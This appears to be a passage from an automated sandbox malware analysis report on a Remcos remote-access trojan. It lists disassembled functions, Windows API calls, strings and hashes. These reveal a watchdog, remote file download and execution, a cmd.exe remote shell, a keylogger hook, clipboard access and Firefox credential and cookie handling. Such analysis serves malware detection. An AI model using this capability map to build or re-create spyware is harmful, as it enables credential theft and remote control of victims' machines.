                                • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9
                                Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 478 40163e-401644 479 401646-401648 478->479 480 401649-401654 478->480 481 401656 480->481 482 40165b-401665 480->482 481->482 483 401667-40166d 482->483 484 401688-401689 call 43229f 482->484 483->484 485 40166f-401674 483->485 488 40168e-40168f 484->488 485->481 487 401676-401686 call 43229f 485->487 490 401691-401693 487->490 488->490
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                                Function 0044D2B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 492 44d2b4-44d2c1 call 443005 494 44d2c6-44d2d1 492->494 495 44d2d7-44d2df 494->495 496 44d2d3-44d2d5 494->496 497 44d31f-44d32d call 443c92 495->497 498 44d2e1-44d2e5 495->498 496->497 500 44d2e7-44d319 call 445fb3 498->500 504 44d31b-44d31e 500->504 504->497
                                APIs
                                  • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                                • _free.LIBCMT ref: 0044D320
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                                • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
                                • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                                • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738
                                Function 00443005 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 505 443005-443010 506 443012-44301c 505->506 507 44301e-443024 505->507 506->507 508 443052-44305d call 43ad91 506->508 509 443026-443027 507->509 510 44303d-44304e RtlAllocateHeap 507->510 515 44305f-443061 508->515 509->510 511 443050 510->511 512 443029-443030 call 442a57 510->512 511->515 512->508 518 443032-44303b call 440480 512->518 518->508 518->510
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                                • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD
                                Function 00443649 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 521 443649-443655 522 443687-443692 call 43ad91 521->522 523 443657-443659 521->523 531 443694-443696 522->531 525 443672-443683 RtlAllocateHeap 523->525 526 44365b-44365c 523->526 527 443685 525->527 528 44365e-443665 call 442a57 525->528 526->525 527->531 528->522 533 443667-443670 call 440480 528->533 533->522 533->525
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

                                Non-executed Functions

                                Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                  • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                  • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                  • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                • API String ID: 3018269243-1736093966
                                • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                  • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                  • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                  • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                  • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                  • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                • DeleteFileA.KERNEL32(?), ref: 0040768E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                • API String ID: 1385304114-1507758755
                                • Opcode ID: cb2d756319963123cdc946bd025587b190db48c268333e126865797fa68f4cfa
                                • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                • Opcode Fuzzy Hash: cb2d756319963123cdc946bd025587b190db48c268333e126865797fa68f4cfa
                                • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056C6
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                • __Init_thread_footer.LIBCMT ref: 00405703
                                • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                • CloseHandle.KERNEL32 ref: 00405A03
                                • CloseHandle.KERNEL32 ref: 00405A0B
                                • CloseHandle.KERNEL32 ref: 00405A1D
                                • CloseHandle.KERNEL32 ref: 00405A25
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: SystemDrive$cmd.exe
                                • API String ID: 2994406822-3633465311
                                • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                • FindClose.KERNEL32(00000000), ref: 0040AC53
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                • FindClose.KERNEL32(00000000), ref: 0040AE11
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 00414EC2
                                • EmptyClipboard.USER32 ref: 00414ED0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                • CloseClipboard.USER32 ref: 00414F55
                                • OpenClipboard.USER32 ref: 00414F5C
                                • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                • CloseClipboard.USER32 ref: 00414F84
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID:
                                • API String ID: 3520204547-0
                                • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                Function 0041A01B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID: 05Mw`Mw
                                • API String ID: 2341273852-1602716814
                                • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7
                                • API String ID: 0-3177665633
                                • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                • GetLastError.KERNEL32 ref: 00418771
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                                • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                                • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                Function 00409340 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                • GetLastError.KERNEL32 ref: 00409375
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                • TranslateMessage.USER32(?), ref: 004093D2
                                • DispatchMessageA.USER32(?), ref: 004093DD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error $`Mw
                                • API String ID: 3219506041-1277971878
                                • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                Function 00410763 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                • SetLastError.KERNEL32(0000000E), ref: 0041082E
                                  • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                                • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                                • SetLastError.KERNEL32(0000045A), ref: 0041098F
                                  • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                                  • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID: $.F
                                • API String ID: 3950776272-1421728423
                                • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                • Opcode ID: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
                                • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                • Opcode Fuzzy Hash: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
                                • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                Function 004466BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00446741
                                • _free.LIBCMT ref: 00446765
                                • _free.LIBCMT ref: 004468EC
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                • _free.LIBCMT ref: 00446AB8
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
